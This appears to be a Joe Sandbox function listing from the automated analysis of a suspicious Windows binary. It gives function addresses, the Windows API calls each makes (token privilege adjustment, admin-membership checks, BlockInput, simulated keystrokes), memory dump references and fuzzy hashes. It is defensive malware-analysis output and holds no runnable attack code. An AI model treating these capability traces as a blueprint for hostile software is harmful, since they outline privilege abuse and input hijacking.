Function 007D51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007D51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007D5238
SetErrorMode.KERNEL32(00000000), ref: 007D52A1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9edfd3ff17b9b23b5d98e1c13418d79e77703224059283ce94cd58e0e6abb6ba
Instruction ID: 1be38dd9ebccf4d13d21d1d707a6c65f0606c8c742fcb63bd33001a651d0065c
Opcode Fuzzy Hash: 9edfd3ff17b9b23b5d98e1c13418d79e77703224059283ce94cd58e0e6abb6ba
Instruction Fuzzy Hash: 04314175A00518DFDB01DF54D888EADBBB5FF49314F088099E8459B352DB35EC59CB90

Function 007C16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0077FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00780668
Part of subcall function 0077FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00780685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C173A
GetLastError.KERNEL32 ref: 007C174A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 2a94f2008284ae03ceded287e05da02da3c1296c4ad6f0d2623c040507e0e55e
Instruction ID: d1d83aadfb25c8813bc48834cc571445e2e240a6af8c4d895c9736d82a0229fa
Opcode Fuzzy Hash: 2a94f2008284ae03ceded287e05da02da3c1296c4ad6f0d2623c040507e0e55e
Instruction Fuzzy Hash: 6811CEB2500308FFD728AF54DD8AE6AB7B9EB04754B20C56EE05693242EB74FC41CA24

Function 007CD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007CD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007CD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007CD650

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6cd1536899cee8d137ecf78ee0fb04e775cbc1f0885029f6ac55ecf44ae27161
Instruction ID: a3633e5d1c8e39044a227b532328c02a772ce3697fcb61669a5f906a9189bd48
Opcode Fuzzy Hash: 6cd1536899cee8d137ecf78ee0fb04e775cbc1f0885029f6ac55ecf44ae27161
Instruction Fuzzy Hash: 5E117C71E05228BBDB208F989C44FAFBBBCEB45B50F108126F904E7290C2744A01CBA1

Function 007C1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007C16A1
FreeSid.ADVAPI32(?), ref: 007C16B1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 64a5f2e38d5bf422bd72f0de0cc774f6d630f3648fb39473cdc4005160a235fc
Instruction ID: d6539eef14045e790adf7922a5b0dea97edc5d13d03bd654c8cfffe76a7a88ef
Opcode Fuzzy Hash: 64a5f2e38d5bf422bd72f0de0cc774f6d630f3648fb39473cdc4005160a235fc
Instruction Fuzzy Hash: 80F0F97195030DFBDB00DFE49D89EAEBBBCEB04704F504965E501E2181D774AA449A54

Function 00784CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(007928E9,?,00784CBE,007928E9,008288B8,0000000C,00784E15,007928E9,00000002,00000000,?,007928E9), ref: 00784D09
TerminateProcess.KERNEL32(00000000,?,00784CBE,007928E9,008288B8,0000000C,00784E15,007928E9,00000002,00000000,?,007928E9), ref: 00784D10
ExitProcess.KERNEL32 ref: 00784D22

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8c56d2c53a60f9cc4052b527b8b18397f2decefb3a9e8eb856ec8013cffef9ce
Instruction ID: a580905bb1d86930fb8aec9b56725abe85e8c57027a9e2778e1b2a50d76a8a58
Opcode Fuzzy Hash: 8c56d2c53a60f9cc4052b527b8b18397f2decefb3a9e8eb856ec8013cffef9ce
Instruction Fuzzy Hash: 85E0B63114054DEBCF12BF64DE09A687B79EF41781B118014FD058A122CB7DED52DB95

Function 0079C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0079C36C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 0577520245b17c59f8e0819656b7a3c39f80f378356ee6d1d2f41857cfc8ea9a
Instruction ID: 9a4fa77bfbe330bcc42668e5a21bb87b9a6a0729fac3849a5583ca677a8908e6
Opcode Fuzzy Hash: 0577520245b17c59f8e0819656b7a3c39f80f378356ee6d1d2f41857cfc8ea9a
Instruction Fuzzy Hash: 2C412772900219AFCF249FB9EC49EBB77B8EB84354F5082A9F905D7181E6749D81CB50

Function 007BD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 007BD28C

Strings

X64, xrefs: 007BD2A8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: d5af0c6f62338a7ba3a1434bd8948687b8db2824d0e283bda2ad1980ac45665a
Instruction ID: 5c74e0ecc1a759f7e87f25aee6b50c48e61e3ed7b4af495b7099d18ba6f9c456
Opcode Fuzzy Hash: d5af0c6f62338a7ba3a1434bd8948687b8db2824d0e283bda2ad1980ac45665a
Instruction Fuzzy Hash: 71D0C9B481111DEACFA4CB90DD88DE9B37CBF04345F104155F106A2000DB7899498F10

Function 0078CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: d72b0d0c41fca111f0fd1c2b132996ee077a0e694047673b2917bd82835d0e86
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: E9022D72E401199BDF15DFA9C8806ADFBF1FF48324F258169E919E7380D734A941CBA4

Function 007D68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007D6918
FindClose.KERNEL32(00000000), ref: 007D6961

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 16b72fb6d416e6ad50569da13ddf8cc489d250e22f9f926da998a75931e9606c
Instruction ID: 5235fab562d23bc76b54535e115ede71d7e94250a27ce2d8f4ed0e586c2b2c2e
Opcode Fuzzy Hash: 16b72fb6d416e6ad50569da13ddf8cc489d250e22f9f926da998a75931e9606c
Instruction Fuzzy Hash: E4117F716042009FD710DF69D488A26BBE5FF85328F14C69EE8698B7A2C734EC05CB91

Function 007D37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007E4891,?,?,00000035,?), ref: 007D37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007E4891,?,?,00000035,?), ref: 007D37F4

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f848a9bce038dde7a263bac6b7d9ea0a4ebcd3e5e046a286f11a7880f7c2897b
Instruction ID: 5a2f662a4234fad72279026eef1f7d9f3287773a9f96ecb3620e85c21ac399f0
Opcode Fuzzy Hash: f848a9bce038dde7a263bac6b7d9ea0a4ebcd3e5e046a286f11a7880f7c2897b
Instruction Fuzzy Hash: 92F0E5B06052296AE72017768D8DFEB3BAEEFC5771F000266F509E2281D9749904C6B1

Function 007CB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007CB25D
keybd_event.USER32(?,753DC0D0,?,00000000), ref: 007CB270

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 577edb2a02d7c567d77f192f7b16760430b06ab754ceee1bae79ca304e4d37b0
Instruction ID: 31ebc57e09e8c93de696b88bee00ca8e86037b09576497ed32744abb553f6e06
Opcode Fuzzy Hash: 577edb2a02d7c567d77f192f7b16760430b06ab754ceee1bae79ca304e4d37b0
Instruction Fuzzy Hash: 50F01D7180424DABDB059FA0C806BBE7BB4FF08305F108409F965A6191C37D9615DF94

Function 007C10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C11FC), ref: 007C10D4
CloseHandle.KERNEL32(?,?,007C11FC), ref: 007C10E9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f51eca198d33613898e5b83a26f87dfd605bf481a31fc649fe1342fdbdd4681e
Instruction ID: 2fa46c99acb7360395866b2604a13c4d81ed79c4c89b583e305827a7dd5ed753
Opcode Fuzzy Hash: f51eca198d33613898e5b83a26f87dfd605bf481a31fc649fe1342fdbdd4681e
Instruction Fuzzy Hash: C8E04F32008600EEEB262B11FD09E7377A9EF04350B10C82DF4A5804B1DB666C90EB54

Function 0076CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 007B0C40

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 61581ec3ab4d15110c0ee5b5f69d067cf6500cf6a96c3d92a86997ec0014a69d
Instruction ID: c08d00d29de3703b337d50008b7cad8e88b5d68a0701f979230b23e106ed6dd1
Opcode Fuzzy Hash: 61581ec3ab4d15110c0ee5b5f69d067cf6500cf6a96c3d92a86997ec0014a69d
Instruction Fuzzy Hash: 4F326A70A00218DBCF15DF94C895BFEB7B5BF05344F148059E847AB292DB79AE49CBA0

Function 0079676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00796766,?,?,00000008,?,?,0079FEFE,00000000), ref: 00796998

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3490a814563acbacab47af7d86cd1b32209eaabd4dfee09c1f3f0ca3561c99eb
Instruction ID: 4f09b7516dd11303a127aaffb744ed59053e1877d0916e97f1cab93f8e764f27
Opcode Fuzzy Hash: 3490a814563acbacab47af7d86cd1b32209eaabd4dfee09c1f3f0ca3561c99eb
Instruction Fuzzy Hash: EBB139716106089FDB19CF28D48AB657BE0FF45364F25C658E8A9CF2A2C739E991CB40

Function 0077B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 007B851F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9c6294b85f717cb31f19ddbd775755571eabcbd102b794072593c5abf193d643
Instruction ID: ff2816fb14bd1f4985fc2b3ed42c0fceb7566e3e89562d82836ba69792220421
Opcode Fuzzy Hash: 9c6294b85f717cb31f19ddbd775755571eabcbd102b794072593c5abf193d643
Instruction Fuzzy Hash: B2124F75900229DBCF64CF58C8807EEB7F5FF48710F14819AE849EB255EB389A81CB91

Function 007DEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 007DEABD

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c544acc820f5b417bded72f3e0817e098b866c25825c363d315125e8ce44722c
Instruction ID: d68c7b4c408bef8f3c2de93a5c64bce48c81e833ea73f7be8267aba83a58101b
Opcode Fuzzy Hash: c544acc820f5b417bded72f3e0817e098b866c25825c363d315125e8ce44722c
Instruction Fuzzy Hash: BAE012312002059FC711EF59D404DAABBE9AF98760F00C416FC46DB351D674A8408B91

Function 007809D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007803EE), ref: 007809DA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e8bf01daa6f9ac14c3718bf3dcdff1fca4d0ebe162ed289b7a3c6f8cf0bd1dbc
Instruction ID: daac9dc25e03a7d5b697878af22665c746b99b1fe0394d889d75c0d22fab9049
Opcode Fuzzy Hash: e8bf01daa6f9ac14c3718bf3dcdff1fca4d0ebe162ed289b7a3c6f8cf0bd1dbc
Instruction Fuzzy Hash:

Function 0078781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0078798B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 965ea658bbacbb71d23ae4d66354fbfce03e3248c71728979c11bbf3124a3dea
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: B05189716CC7059BDB3CB968889E7BE27899B12340F780509D887DB282DA1DFE41D352

Function 00796DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9b5c7a03a4fbe59e4357f0455ce1188e77a668ab018563b7dcac512a8b9f09
Instruction ID: e0c9933503b48271d2cf796bc8cd187a70090599352d504470b8e24ff7c312e4
Opcode Fuzzy Hash: 4c9b5c7a03a4fbe59e4357f0455ce1188e77a668ab018563b7dcac512a8b9f09
Instruction Fuzzy Hash: C1324322D39F414DDB679634EC26336A249BFB73C5F15C337E81AB59A6EB28C4838100

Function 0077CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 352bdba2f8452111bdb0f8a47f43ff3608e55e3ecbad35d371218e769c3d2998
Instruction ID: f8fa55ba4c14864969f492470435b3c63bea6c54e6a22e016318ed2585fd1da4
Opcode Fuzzy Hash: 352bdba2f8452111bdb0f8a47f43ff3608e55e3ecbad35d371218e769c3d2998
Instruction Fuzzy Hash: 0332F331A002158BDF3BCE28C4A47FD7BA1EB49354F28C56AD45ADB291E63CDD81DB60

